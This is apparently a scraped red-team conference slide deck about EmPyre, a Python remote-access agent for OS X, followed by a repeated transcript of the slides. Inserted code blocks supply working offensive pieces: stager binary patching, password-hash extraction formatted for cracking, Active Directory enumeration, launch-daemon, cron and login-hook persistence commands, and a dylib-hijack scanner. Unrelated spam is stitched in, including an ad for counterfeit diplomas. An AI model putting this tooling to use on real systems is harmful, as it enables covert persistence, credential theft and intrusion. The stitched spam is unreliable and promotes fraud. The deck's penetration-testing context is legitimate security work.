Building an EmPyre with Python
@harmj0y
× Researcher/red teamer for the Adaptive Threat Division
× Co-founder/active developer of the Veil-Framework | PowerView | PowerUp | Empire
× Microsoft CDM/PowerShell MVP and active PowerSploit developer
@424f424f
× U.S. Army Infantry combat veteran
× Red teamer/penetration tester for the Adaptive Threat Division
× Instructor for ATD's "Adaptive Penetration Testing" course
@killswitch_gui
× Former U.S. Army soldier
× Red teamer/penetration tester for the Adaptive Threat Division
× Developed SimplyEmail / SimplyTemplate
tl;dr
× Overview/”Why Build This”/RATs 101
× EmPyre
× Stagers
× Host/network triage
× Lateral movement
× Persistence
× The Future
× Demos throughout!
Why build this?
Motivations
× A high-security client wanted a penetration test against their corporate infrastructure
× which was 80% OS X...
× We did our research and found very few options for a "complete" OS X agent
× though small post-exploitation pieces did exist
Adversarial OS X
× WireLurker (trojanized applications; infects connected iOS devices)
× XcodeGhost (infected Xcode package distributed in China)
× Hacking Team (Remote Control System compromise platform)
× OceanLotus (Flash dropper that downloads a Mach-O binary)
× KeRanger (ransomware delivered in an infected Transmission package)
OS X Challenges
× Not nearly as many public OS X attack toolsets out there as there are for Windows
× Access vectors are significantly more limited than on Windows as well
× Lateral spread is complicated a bit (no pass-the-hash!)
RATs 101
× We have a number of broad design goals for our solution:
× Staging flexibility
× Modularity
× (Reasonably) strong crypto
× The "staging problem"
× Your malicious code has to SOMEHOW get to the target
EmPyre background
× Python agent and controller
× heavily based on the PowerShell Empire project
× Python 2.6 and 2.7 compatible on OS X/Linux: "living off the land" with the interpreter already on the host
× Asynchronous communications (HTTP[S])
× Diffie-Hellman based encrypted key exchange
× Variety of post-exploitation modules
Module development
× Like Empire, development is quick due to the modular structure and the use of a scripting language
× Modules == metadata containers for an embedded Python script
× Things like option sets, needs admin, opsec safe, save file output, etc.
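The "metadata container around an embedded script" idea, as an added example that is not EmPyre's own module loader. The info and option field names (NeedsAdmin, OpsecSafe, OutputExtension, Required/Value) are assumptions chosen to mirror the properties listed above; the two modules are constructed for illustration.

```python
import string


class ModuleError(ValueError):
    """Raised when a module cannot be tasked as currently configured."""


class Module(object):
    """Metadata container around an embedded Python script.

    info    : module metadata (Name, Author, Description, NeedsAdmin,
              OpsecSafe, OutputExtension); the field names are assumptions
    options : {name: {"Description": str, "Required": bool, "Value": str}}
    script  : Python source with $Option placeholders, executed on the agent
    """

    def __init__(self, info, options, script):
        self.info = info
        self.options = options
        self.script = script

    def set_option(self, name, value):
        if name not in self.options:
            raise ModuleError("unknown option: %s" % name)
        self.options[name]["Value"] = value

    def check(self, agent_is_admin=False):
        """Return the reasons the module cannot run (empty list if it can)."""
        problems = []
        missing = sorted(n for n, o in self.options.items()
                         if o["Required"] and o["Value"] in ("", None))
        if missing:
            problems.append("required option(s) unset: %s" % ", ".join(missing))
        if self.info["NeedsAdmin"] and not agent_is_admin:
            problems.append("module requires an elevated agent")
        return problems

    def generate(self, agent_is_admin=False):
        """Render the tasking script with the option values substituted."""
        problems = self.check(agent_is_admin)
        if problems:
            raise ModuleError("; ".join(problems))
        values = dict((n, str(o["Value"])) for n, o in self.options.items())
        # safe_substitute leaves any $token the module did not declare untouched
        return string.Template(self.script).safe_substitute(values)


def find_recent_module():
    """A fresh collection module: list files modified in the last N days."""
    return Module(
        info={"Name": "collection/osx/find_recent", "Author": "example",
              "Description": "List recently modified files under a path",
              "NeedsAdmin": False, "OpsecSafe": True, "OutputExtension": "txt"},
        options={
            "Agent": {"Description": "Agent to run on", "Required": True, "Value": ""},
            "Path":  {"Description": "Directory to walk", "Required": True, "Value": "/Users"},
            "Days":  {"Description": "Modified within N days", "Required": False, "Value": "7"},
        },
        script='''
import os, time
cutoff = time.time() - int("$Days") * 86400
for root, dirs, files in os.walk("$Path"):
    for name in files:
        path = os.path.join(root, name)
        try:
            if os.path.getmtime(path) > cutoff:
                print(path)
        except OSError:
            pass
''')


def hashdump_module():
    """A fresh module flagged NeedsAdmin, so generate() refuses on a user-level agent."""
    return Module(
        info={"Name": "collection/osx/hashdump", "Author": "example",
              "Description": "Read ShadowHashData from the local directory store",
              "NeedsAdmin": True, "OpsecSafe": True, "OutputExtension": None},
        options={"Agent": {"Description": "Agent to run on", "Required": True, "Value": ""}},
        script='print("would read /var/db/dslocal/nodes/Default/users/*.plist as root")',
    )


if __name__ == "__main__":
    m = find_recent_module()
    m.set_option("Agent", "EXAMPLE1")
    print(m.generate())
```

The controller only ever sees `check()` and `generate()`; the script body is data, so adding a module is writing a dict and a string rather than touching the agent.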
stagers
OS X Macros
× Works on Office 2011 and below; otherwise we're stuck in the...
Mach-O binaries
× Mach object file format for executables, object code, shared libraries, dynamically loaded code and core dumps
× We hot-patch a binary with the EmPyre stager code
× The binary contains the Python interpreter
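The hot-patching step, as an added example rather than EmPyre's stager builder: the stager text is written into a fixed-size region reserved inside a template image, so the file size and every offset in the Mach-O load commands stay untouched. The marker string, the region size and the template layout are assumptions; the page does not describe the real template.

```python
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",  # 32-bit, big/little endian
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",  # 64-bit
    b"\xca\xfe\xba\xbe",                       # fat (universal) image
}
# Assumed for the example: the template reserves REGION_SIZE NUL-filled bytes
# that begin with MARKER. The real template's layout is not on the page.
MARKER = b"@@STAGER_REGION@@"
REGION_SIZE = 2048


def is_macho(blob):
    return blob[:4] in MACHO_MAGICS


def stager_fits(stager):
    return len(stager.encode("utf-8")) + 1 <= REGION_SIZE


def patch_stager(blob, stager):
    """Return (patched_image, region_offset).

    Only the reserved region is overwritten, so the image keeps its exact size
    and the file offsets in the load commands remain valid. Appending to the
    file or growing the region would break them, which is why this is a patch
    and not a rebuild.
    """
    if not is_macho(blob):
        raise ValueError("not a Mach-O image")
    start = blob.find(MARKER)
    if start < 0:
        raise ValueError("reserved region marker not found")
    if not stager_fits(stager):
        raise ValueError("stager does not fit in the %d-byte region" % REGION_SIZE)
    payload = stager.encode("utf-8") + b"\0"
    patched = blob[:start] + payload.ljust(REGION_SIZE, b"\0") + blob[start + REGION_SIZE:]
    assert len(patched) == len(blob)
    return patched, start


def read_stager(blob, offset):
    """What the embedded interpreter does at run time: read the region up to the first NUL."""
    return blob[offset:offset + REGION_SIZE].split(b"\0", 1)[0].decode("utf-8")


def constructed_template():
    """Stand-in for the compiled template: 64-bit magic, x86_64 cputype, filler,
    the reserved region, more filler. Constructed, not a real binary."""
    return (b"\xcf\xfa\xed\xfe" + b"\x07\x00\x00\x01" + b"\x00" * 120
            + MARKER.ljust(REGION_SIZE, b"\0") + b"\x00" * 64)
```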
Dylib Hijacking
× Ported from @patrickwardle's research
× https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf
× Abuses search-order loading
× Also a method of persistence in EmPyre
Hijack Scanner
Dylib Hijacker
Demo: Phishing with EmPyre
Host triage
Privilege escalation
× Users often run as admin
× Two prompt modules for credential collection:
× Mac app prompting - osascript
× Screensaver alleyoop - osascript / security
× Elevate using sudo_spawn to spawn a new EmPyre agent
Chainbreaker
× Keychaindump (juuso)
× Keychain exploitable prior to OS X Yosemite to recover the master key from memory
× Decrypt the keychain store using the master key candidate
× Keychaindump_chainbreaker (n0fate)
× Allows master key and password input for decryption of the entire keychain
× Fully ported to allow on-target dumps rather than offline
Hashdumping
× Built-in hashdump module:
× sudo required, of course
× Output is hashcat ready
× Hash format differs between OS X releases
× 10.8+ uses Salted-SHA512-PBKDF2
× entropy = PBKDF2-HMAC-SHA512(password, salt, iterations); the iteration count is stored alongside the salt
× Ultimately a very slow hash to crack (low H/s)
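The 10.8+ format end to end, as an added example that is not EmPyre's hashdump module: build the SALTED-SHA512-PBKDF2 record macOS keeps inside a user's ShadowHashData, parse it back, emit the `$ml$` line hashcat mode 7100 consumes, and show what a cracker must pay per guess. The password, salt and iteration count are constructed; the example never reads the real root-only plist.

```python
import hashlib
import hmac
import plistlib

# Where macOS (10.8+) keeps per-user records, root-readable only; the example
# never touches it and instead builds an equivalent record from constructed values.
USER_PLIST_DIR = "/var/db/dslocal/nodes/Default/users"
ENTROPY_LEN = 128   # bytes of PBKDF2 output macOS stores as "entropy"
SALT_LEN = 32


def derive_entropy(password, salt, iterations):
    """Salted-SHA512-PBKDF2: entropy = PBKDF2-HMAC-SHA512(password, salt, iterations, 128)."""
    return hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"), salt, iterations, ENTROPY_LEN)


def build_shadow_hash_data(password, salt, iterations):
    """Construct the inner binary plist a user's ShadowHashData array holds."""
    record = {"SALTED-SHA512-PBKDF2": {
        "entropy": derive_entropy(password, salt, iterations),
        "salt": salt,
        "iterations": iterations,
    }}
    return plistlib.dumps(record, fmt=plistlib.FMT_BINARY)


def parse_shadow_hash_data(blob):
    """Recover (iterations, salt, entropy) from that inner plist."""
    fields = plistlib.loads(blob)["SALTED-SHA512-PBKDF2"]
    return fields["iterations"], bytes(fields["salt"]), bytes(fields["entropy"])


def to_hashcat(iterations, salt, entropy):
    """hashcat mode 7100 line: $ml$<iterations>$<salt hex>$<entropy hex>.
    PBKDF2 output is prefix-stable, so the first 64 bytes suffice; that is the
    length hashcat's reference hash for this mode carries."""
    return "$ml$%d$%s$%s" % (iterations, salt.hex(), entropy[:64].hex())


def check_candidate(candidate, iterations, salt, entropy):
    """One cracking attempt: redo the full derivation and compare. Each guess
    costs `iterations` HMAC-SHA512 rounds per 64-byte output block, which is
    why the hashes-per-second rate is so low."""
    return hmac.compare_digest(derive_entropy(candidate, salt, iterations), entropy)


if __name__ == "__main__":
    salt = bytes(range(SALT_LEN))        # constructed; real salts are random
    blob = build_shadow_hash_data("Winter2016!", salt, 28000)
    it, s, e = parse_shadow_hash_data(blob)
    print(to_hashcat(it, s, e))
```

On a real host the outer per-user plist holds ShadowHashData as an array with one data element, which is the inner binary plist parsed here; reading it is the step that needs root.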
Keylogging
× Uses Ruby code adapted from MSF:
× Captures and logs keystrokes to a file currently
× Runs as a separate Ruby process
Screenshots
× Currently supports two separate methods:
× Native - the built-in screencapture tool
× Python - using Quartz API calls
× Environment can dictate the use of native tools
× CGImageDestinationCreateWithURL() and screencapture both take only an output path for the image, so it is written to disk and read back rather than returned in memory
Clipboard theft
× Great way to target and collect credentials
× Output to file or pipeline:
× Timed collection allows continuous monitoring using background jobs
× Uses a non-native method via the AppKit API (NSPasteboard):
× Native pbpaste may be signatured by Carbon Black
Demo: Host Triage with EmPyre
Network situational awareness
OS X is on the Domain Too!
× Admins want/need to:
× Enforce corporate policy via Group Policy
× Manage resources
× Manage users
× Advertise resources such as printers
× Benefit from single sign-on access to Active Directory resources through Kerberos
OS X and LDAP
× ldapsearch tool
× opens a connection to an LDAP server, binds, and performs a search using the specified parameters
× dig -t SRV _ldap._tcp.example.com
× the DNS SRV lookup tells you which hosts are the domain controllers to query
PowerView, OS X Style
× Wanted to mimic the features of PowerSploit's PowerView to enumerate Active Directory
× Using ldapsearch, we can mimic "most" features
× Unfortunately, every ldapsearch run is a fresh bind, so each query creates a log entry on the domain controller
Situational Awareness, AD Enumeration
× get_computers
× get_domaincontrollers
× get_fileservers
× get_groupmembers
× get_groupmemberships
× get_groups
× get_ous
× get_userinformation
× get_users
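The ldapsearch approach behind those functions, as an added example rather than EmPyre's situational-awareness modules: the filters each function runs, the argv handed to ldapsearch (authenticating with the host's existing Kerberos ticket), an LDIF parser for the output, and the PowerView-style derivation of file servers from user attributes. The domain, search base and the LDIF sample are constructed.

```python
import base64

# Assumed lab values; replace with the target domain, a DC hostname and its search base.
DOMAIN = "corp.example.com"
BASE_DN = "DC=corp,DC=example,DC=com"

# LDAP filters behind the listed functions. 8192 is SERVER_TRUST_ACCOUNT in
# userAccountControl, tested with the LDAP_MATCHING_RULE_BIT_AND OID.
FILTERS = {
    "get_computers": "(objectCategory=computer)",
    "get_domaincontrollers": "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))",
    "get_groups": "(objectCategory=group)",
    "get_ous": "(objectCategory=organizationalUnit)",
    "get_users": "(&(objectCategory=person)(objectClass=user))",
}


def ldap_escape(value):
    """RFC 4515 escaping for values placed inside a search filter."""
    return (value.replace("\\", "\\5c").replace("*", "\\2a")
                 .replace("(", "\\28").replace(")", "\\29").replace("\0", "\\00"))


def find_dc_cmd(domain=DOMAIN):
    """The SRV lookup from the slide: DNS tells you which hosts serve LDAP for the domain."""
    return ["dig", "-t", "SRV", "_ldap._tcp.%s" % domain]


def ldapsearch_cmd(ldap_filter, dc_host, attrs=(), base_dn=BASE_DN):
    """argv for one query. -Y GSSAPI reuses the host's Kerberos ticket, -LLL gives
    bare LDIF. Each invocation is a fresh bind, which is the logging cost noted above."""
    return ["ldapsearch", "-LLL", "-Y", "GSSAPI", "-H", "ldap://%s" % dc_host,
            "-b", base_dn, ldap_filter] + list(attrs)


def get_groupmembers_cmd(group_dn, dc_host):
    return ldapsearch_cmd("(memberOf=%s)" % ldap_escape(group_dn), dc_host, ["sAMAccountName"])


def parse_ldif(text):
    """Turn -LLL output into [{attr: [values]}], unfolding continuation lines
    (leading space) and decoding base64 values ('attr:: ...')."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines:
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):
            decoded = base64.b64decode(value[1:].strip())
            try:
                value = decoded.decode("utf-8")
            except UnicodeDecodeError:
                value = decoded  # binary attribute such as objectSid
        else:
            value = value.strip()
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries


def get_groupmemberships(entry):
    return list(entry.get("memberOf", []))


def get_fileservers(user_entries):
    """Hosts referenced by users' homeDirectory/scriptPath/profilePath (PowerView's approach)."""
    hosts = set()
    for entry in user_entries:
        for attr in ("homeDirectory", "scriptPath", "profilePath"):
            for value in entry.get(attr, []):
                if value.startswith("\\\\"):
                    hosts.add(value[2:].split("\\", 1)[0].lower())
    return sorted(hosts)


# Constructed sample of what the get_users query returns (two users, one folded line,
# one base64-encoded non-ASCII description).
SAMPLE_LDIF = r"""dn: CN=jdoe,OU=Staff,DC=corp,DC=example,DC=com
sAMAccountName: jdoe
homeDirectory: \\FS01.corp.example.com\home\jdoe
scriptPath: \\dc01\netlogon\login.bat
description:: T2zDoQ==

dn: CN=asmith,OU=Staff,DC=corp,DC=example,DC=com
sAMAccountName: asmith
profilePath: \\fs02\profiles\asmith
memberOf: CN=Domain Admins,CN=Users,DC=corp,DC=example,DC=com
memberOf: CN=Workstation Admins,OU=Groups,DC=corp,DC=exa
 mple,DC=com
"""
```

Run the argv with subprocess on a domain-joined Mac that already holds a TGT (check with klist), feed stdout to parse_ldif, and chain the results: get_users output feeds get_fileservers, a group DN from get_groups feeds get_groupmembers_cmd.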
Overpass-the-Hash
× Original research by @gentilkiwi and @obscuresec, OS X research by @passingthehash
× Upgrading an NT hash into a full Kerberos ticket: the NT hash is the RC4-HMAC Kerberos key, so it can be used to request a TGT without the plaintext password
× Utilities
× kinit - acquire initial Kerberos credentials
× klist - list Kerberos credentials
× kdestroy - remove Kerberos credentials
Demo: Domain Enumeration with EmPyre
Lateral movement
OS X vs Windows
× Common Windows lateral movement methods:
× WMI, PsExec, WinRM, Remote Desktop
× OS X disappoints a bit on this front...
× SSH is available but disabled by default
× winexe installed through Homebrew is possible (for moving from the Mac onto Windows hosts)
× EmPyre modules:
× ssh_command / ssh_launcher
Web Service Exploitation
× JBoss exploit
× Pass exploit to Empire server
Persistence
OS X vs Windows
× Common Windows persistence methods:
× Registry keys
× Startup folders
× WMI
× DLL hijacks
× Backdoor accounts
× OS X is also quite fruitful:
× Crontabs
× Login hooks
× Launch daemons
× Dylib hijacking
Crontabs, Daemons, and Login Hooks
× Login hook - user context
× Bash / AppleScript / binary execution
× Runs the payload when a given user, or any user, logs on
× Set via the LoginHook key of com.apple.loginwindow
× Crontabs - user context
× Requires a bash / AppleScript / binary payload
× Timed execution of the payload
× Great for continued access
× Launch daemons - root context
× Requires sudo
× Launch behaviour is determined by the XML manifest (RunAtLoad brings it back after a reboot)
× Once started, daemons (services) are restarted by launchd if the agent dies (KeepAlive)
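The three mechanisms side by side, as an added example and not EmPyre's persistence modules: the launchd manifest with the two keys the slide relies on, the install commands, a crontab entry and the login hook, plus the check a defender would run over a suspicious plist. The label, paths and program are assumptions.

```python
import os
import plistlib

# Assumed names for the example; nothing on the page specifies them.
LABEL = "com.example.updater"
PLIST_PATH = "/Library/LaunchDaemons/%s.plist" % LABEL
PROGRAM = ["/usr/bin/python", "/Library/Application Support/Example/agent.py"]
INTERPRETERS = ("python", "bash", "sh", "osascript", "perl", "ruby")


def launch_daemon_plist(label, program_args, keep_alive=True):
    """The XML manifest. RunAtLoad starts the job whenever launchd loads it (so
    again after every reboot); KeepAlive makes launchd respawn it if the agent
    exits. Placed in /Library/LaunchDaemons it runs as root, hence the sudo below."""
    manifest = {
        "Label": label,
        "ProgramArguments": list(program_args),
        "RunAtLoad": True,
        "KeepAlive": keep_alive,
    }
    return plistlib.dumps(manifest)  # XML plist by default


def load_manifest(plist_bytes):
    return plistlib.loads(plist_bytes)


def launch_daemon_install_commands(plist_path):
    """What an operator runs after writing the manifest to disk."""
    return ["sudo chown root:wheel '%s'" % plist_path,
            "sudo chmod 644 '%s'" % plist_path,
            "sudo launchctl load -w '%s'" % plist_path]


def crontab_entry(every_minutes, command):
    """User-context timed execution; appended with: (crontab -l; echo ENTRY) | crontab -"""
    return "*/%d * * * * %s" % (every_minutes, command)


def login_hook_command(script_path):
    """loginwindow runs the hook at each login. The key lives in root's
    com.apple.loginwindow defaults, so writing it needs sudo."""
    return "sudo defaults write com.apple.loginwindow LoginHook '%s'" % script_path


def triage_launch_item(plist_bytes):
    """Defender-side check for the properties this persistence depends on."""
    manifest = plistlib.loads(plist_bytes)
    findings = []
    if manifest.get("RunAtLoad") and manifest.get("KeepAlive"):
        findings.append("RunAtLoad+KeepAlive: starts at boot and is respawned on exit")
    args = manifest.get("ProgramArguments") or []
    if args and os.path.basename(args[0]) in INTERPRETERS:
        findings.append("interpreter launcher: %s" % " ".join(args))
    return findings


if __name__ == "__main__":
    print(launch_daemon_plist(LABEL, PROGRAM).decode())
    for cmd in launch_daemon_install_commands(PLIST_PATH):
        print(cmd)
    print(crontab_entry(5, " ".join(PROGRAM)))
```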
Persistence with Dylib Hijacking
× EmPyre implements @patrickwardle's research to scan for hijackable dylibs!
× rpath search, weak dylib import search
× CreateHijacker module
× allows for quick exploitation
× ease of generating the payload
× patches in the path to the legitimate dylib so the original still loads and the application keeps working
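The two scans named here (and on the earlier Dylib Hijacking slide), as an added example that is not EmPyre's hijack scanner: walk a 64-bit Mach-O's load commands, collect LC_LOAD_DYLIB / LC_LOAD_WEAK_DYLIB imports and LC_RPATH entries, then apply the two cases from the paper. The binary and filesystem are constructed in memory, and LC_RPATH entries are taken literally (no @executable_path or @loader_path expansion).

```python
import os
import struct

MH_MAGIC_64 = 0xFEEDFACF
LC_REQ_DYLD = 0x80000000
LC_LOAD_DYLIB = 0x0C
LC_LOAD_WEAK_DYLIB = 0x18 | LC_REQ_DYLD
LC_RPATH = 0x1C | LC_REQ_DYLD


def _string_cmd(cmd, fixed_fmt, fixed_vals, path):
    """Pack a load command whose lc_str points just past the fixed fields."""
    fixed_len = struct.calcsize(fixed_fmt)
    name = path.encode() + b"\0"
    size = fixed_len + len(name)
    size += -size % 8                       # cmdsize is 8-byte aligned in 64-bit images
    return struct.pack(fixed_fmt, cmd, size, fixed_len, *fixed_vals) + name.ljust(size - fixed_len, b"\0")


def dylib_cmd(cmd, path):
    # cmd, cmdsize, name offset, timestamp, current_version, compatibility_version
    return _string_cmd(cmd, "<IIIIII", (2, 0x10000, 0x10000), path)


def rpath_cmd(path):
    # cmd, cmdsize, path offset
    return _string_cmd(LC_RPATH, "<III", (), path)


def build_macho(cmds):
    """Header for a little-endian x86_64 MH_EXECUTE image followed by the load commands."""
    body = b"".join(cmds)
    header = struct.pack("<IiiIIIII", MH_MAGIC_64, 0x01000007, 3, 2, len(cmds), len(body), 0, 0)
    return header + body


def _lc_string(blob, off, size):
    name_off, = struct.unpack_from("<I", blob, off + 8)
    return blob[off + name_off:off + size].split(b"\0", 1)[0].decode()


def parse_load_commands(blob):
    """Return ([(dylib_path, is_weak)], [rpath]) in load-command order."""
    magic, = struct.unpack_from("<I", blob, 0)
    if magic != MH_MAGIC_64:
        raise ValueError("only thin little-endian 64-bit images are handled here")
    ncmds, = struct.unpack_from("<I", blob, 16)
    off, dylibs, rpaths = 32, [], []
    for _ in range(ncmds):
        cmd, size = struct.unpack_from("<II", blob, off)
        if cmd in (LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB):
            dylibs.append((_lc_string(blob, off, size), cmd == LC_LOAD_WEAK_DYLIB))
        elif cmd == LC_RPATH:
            rpaths.append(_lc_string(blob, off, size))
        off += size
    return dylibs, rpaths


def find_hijacks(blob, exists=os.path.exists):
    """The two cases from the paper. 'weak': a weak import that is absent, so a
    dylib planted there is loaded instead of being skipped. 'rpath': an @rpath/
    import found only in a later LC_RPATH directory, so a copy planted in an
    earlier directory wins the search. `exists` is injectable so the scan can
    run against a constructed filesystem (or a listing pulled from a target)."""
    dylibs, rpaths = parse_load_commands(blob)
    findings = []
    for path, weak in dylibs:
        if path.startswith("@rpath/"):
            candidates = [os.path.join(r, path[len("@rpath/"):]) for r in rpaths]
            present = [c for c in candidates if exists(c)]
            if present:
                findings += [("rpath", c) for c in candidates[:candidates.index(present[0])]]
            elif weak and candidates:
                findings.append(("weak", candidates[0]))
        elif weak and not exists(path):
            findings.append(("weak", path))
    return findings


# Constructed image standing in for a scanned application binary.
SAMPLE_BINARY = build_macho([
    dylib_cmd(LC_LOAD_DYLIB, "/usr/lib/libSystem.B.dylib"),
    dylib_cmd(LC_LOAD_DYLIB, "@rpath/libShared.dylib"),
    dylib_cmd(LC_LOAD_WEAK_DYLIB, "/Library/Frameworks/Optional.framework/Optional"),
    rpath_cmd("/Applications/Example.app/Contents/MacOS"),
    rpath_cmd("/Applications/Example.app/Contents/Frameworks"),
])
# Constructed filesystem: the shared dylib exists only under the second rpath entry.
SAMPLE_FS = {"/usr/lib/libSystem.B.dylib",
             "/Applications/Example.app/Contents/Frameworks/libShared.dylib"}


def scan_sample():
    return find_hijacks(SAMPLE_BINARY, exists=SAMPLE_FS.__contains__)


if __name__ == "__main__":
    for kind, path in scan_sample():
        print("%-5s plant dylib at %s" % (kind, path))
```

A finding is only exploitable if the directory is writable by the user you have, and the planted dylib still has to re-export or forward to the legitimate library for an rpath hijack, which is what the CreateHijacker module's patched-in path takes care of.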
Questions?
@harmj0y / will [at] harmj0y.net
@424f424f / steveborosh [at] gmail.com
@killswitch_gui / a.rymdekoharvey [at] gmail.com

 
原版定制美国加州大学河滨分校毕业证原件一模一样
原版定制美国加州大学河滨分校毕业证原件一模一样原版定制美国加州大学河滨分校毕业证原件一模一样
原版定制美国加州大学河滨分校毕业证原件一模一样
 
The Rise of Subscription-Based Digital Services.pdf
The Rise of Subscription-Based Digital Services.pdfThe Rise of Subscription-Based Digital Services.pdf
The Rise of Subscription-Based Digital Services.pdf
 

Building an EmPyre with Python

  • 2. @harmj0y
    × Researcher/red teamer for the Adaptive Threat Division
    × Co-founder/active developer of the Veil-Framework | PowerView | PowerUp | Empire
    × Microsoft CDM/PowerShell MVP and active PowerSploit developer
  • 3. @424f424f
    × U.S. Army Infantry combat veteran
    × Red teamer/Penetration Tester for the Adaptive Threat Division
    × Instructor for ATD’s “Adaptive Penetration Testing” course
  • 4. @killswitch_gui
    × Previous US Army Soldier
    × Red teamer/Penetration Tester for the Adaptive Threat Division
    × Developed SimplyEmail / SimplyTemplate
  • 5. tl;dr
    × Overview / “Why Build This” / RATs 101
    × EmPyre
    × Stagers
    × Host/network triage
    × Lateral movement
    × Persistence
    × The Future
    × Demos throughout!
  • 7. Motivations
    × A high-security client wanted a penetration test against their corporate infrastructure
    × ... which was 80% OS X …
    × We did our research and found very few options for ‘complete’ OS X agents
    × ... though small post-exploitation pieces did exist
  • 8. Adversarial OS X
    × WireLurker (trojanized applications, infects connected iOS devices)
    × XcodeGhost (infected Xcode package in China)
    × Hacking Team (Remote Code Systems compromise platform)
    × OceanLotus (Flash dropper, downloads a Mach-O binary)
    × KeRanger (ransomware, infected Transmission package)
  • 9. OS X Challenges
    × Not nearly as many public OS X attack toolsets out there as there are for Windows
    × Access vectors are significantly more limited than on Windows as well
    × Lateral spread is complicated a bit (no pth!)
  • 10. RATs 101
    × We have a number of broad design goals for our solution:
    × Staging flexibility
    × Modularity
    × (Reasonably) strong crypto
    × The “staging problem”
    × Your malicious code has to SOMEHOW get to the target
  • 12.
  • 13. Background
    × Python agent and controller
    × Heavily based on the PowerShell Empire project
    × OS X/Linux, Python 2.7 and 2.6 compatible / “living off the land”
    × Asynchronous communications (HTTP[S])
    × Diffie-Hellman based Encrypted Key Exchange
    × Variety of post-exploitation modules
  • 14. Module development
    × Like Empire, development is quick due to the modular structure and use of a scripting language
    × Modules == metadata containers for an embedded Python script
    × Things like option sets, needs admin, opsec safe, save file output, etc.
  • 16. OS X Macros
    × Works on Office 2011 and below, otherwise, we’re stuck in the...
  • 17.
  • 18. Mach-O binaries
    × Mach object file format for executables, object code, shared libraries, dynamically loaded code and core dumps
    × We hot-patch a binary with the EmPyre stager code
    × The binary contains the Python interpreter
  • 19. Dylib Hijacking
    × Ported from @patrickwardle’s research
    × https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf
    × Abuses search-order loading
    × Also a method of persistence in EmPyre
  • 24. Privilege escalation
    × Users often run as admin
    × Two prompt modules for credential collection:
    × Mac app prompting - osascript
    × Screensaver alleyoop - osascript / security
    × Elevate using sudo_spawn to spawn a new EmPyre agent
  • 26. Chainbreaker
    × Keychaindump (juuso)
    × Keychain exploitable prior to OS X Yosemite to recover the master key from memory
    × Decrypt the keychain store using the master key candidate
    × Keychaindump_chainbreaker (n0fate)
    × Allows master key and password input for decryption of the entire keychain
    × Fully ported to allow on-target dumps rather than offline
  • 27. Hashdumping
    × Built-in hashdump module:
    × sudo required, of course
    × Output is hashcat ready
    × Hash format differs between OS X releases
    × 10.8+ uses Salted-SHA512-PBKDF2
    × Password -> iterations -> salt -> PBKDF2 hash
    × Ultimately a very slow hash to crack (low H/s)
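The hashdump slide summarises the 10.8+ scheme as password -> iterations -> salt -> PBKDF2 hash. The following is an added illustration of that chain, not code from the deck or the EmPyre project: it derives the stored value with PBKDF2-HMAC-SHA512, verifies a candidate password in constant time, and times the derivation so the per-guess cost (the iteration count times a SHA-512 HMAC) is visible. The record shape (salt, iterations, entropy) mirrors the ShadowHashData attribute; the 128-byte output length is assumed to match what OS X stores, and the salt and iteration counts below are constructed demo values, far lower than a real record's.

```python
"""Salted-SHA512-PBKDF2 as used by OS X 10.8+: derive, verify, cost out.

Added example, not EmPyre code. Demo salt/iteration values are constructed;
the 128-byte entropy length is assumed to match the on-disk record.
"""
import hashlib
import hmac
import os
import time

ENTROPY_LEN = 128  # assumed: length of the stored PBKDF2 output on OS X


def derive_entropy(password, salt, iterations):
    """Password -> iterations -> salt -> PBKDF2-HMAC-SHA512 (the chain on the slide)."""
    return hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"),
                               salt, iterations, ENTROPY_LEN)


def make_record(password, iterations, salt=None):
    """Build a constructed record in the same shape the directory service keeps."""
    salt = salt if salt is not None else os.urandom(32)
    return {"iterations": iterations, "salt": salt,
            "entropy": derive_entropy(password, salt, iterations)}


def verify_password(candidate, record):
    """Re-derive with the record's own salt/iterations and compare in constant time."""
    guess = derive_entropy(candidate, record["salt"], record["iterations"])
    return hmac.compare_digest(guess, record["entropy"])


def guesses_per_second(iterations, trials=5):
    """Single-threaded derivations per second at a given iteration count.

    Every guess costs about `iterations` HMAC-SHA512 calls per output block,
    so the rate drops linearly with the count; that is the low H/s the slide
    refers to.
    """
    salt = b"\x00" * 32
    start = time.perf_counter()
    for i in range(trials):
        derive_entropy("guess%d" % i, salt, iterations)
    elapsed = time.perf_counter() - start
    return trials / elapsed if elapsed > 0 else float("inf")


if __name__ == "__main__":
    rec = make_record("correct horse battery", iterations=1000)
    print("right password verifies:", verify_password("correct horse battery", rec))
    print("wrong password verifies:", verify_password("Tr0ub4dor&3", rec))
    for n in (1000, 10000):
        print("%6d iterations: %.1f guesses/s" % (n, guesses_per_second(n)))
```

Comparing the two printed rates makes the slide's point: a tenfold increase in the iteration count costs a legitimate login a few more milliseconds but cuts an attacker's guess rate by the same factor, which is why cracking these hashes is slow even on GPUs.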
  • 29. Keylogging
    × Uses Ruby code adapted from MSF:
    × Captures and logs keystrokes to a file currently
    × Runs as a separate Ruby process
  • 30. Screenshots
    × Currently supports two separate methods:
    × Native - screenshot built-in tool
    × Python - using Quartz API calls
    × Environment can dictate the use of native tools
    × CGImageDestinationCreateWithURL() and screenshot only allow an output path for the image
  • 31. Clipboard theft
    × Great way to target and collect credentials
    × Output to file or pipeline:
    × Timed collection allows continuous monitoring using background jobs
    × Uses a non-native method via the AppKit API:
    × Native pbpaste may be signatured by Carbon Black
  • 32.
  • 33. Demo: Host Triage with EmPyre
  • 35. OS X is on the Domain Too!
    × Admins want/need to:
    × Enforce corporate policy via Group Policy
    × Manage resources
    × Manage users
    × Advertise resources such as printers
    × Benefit from single sign-on access to Active Directory resources through Kerberos
  • 36.
  • 37. OS X and LDAP
    × ldapsearch tool
    × Opens a connection to an LDAP server, binds, and performs a search using the specified parameters
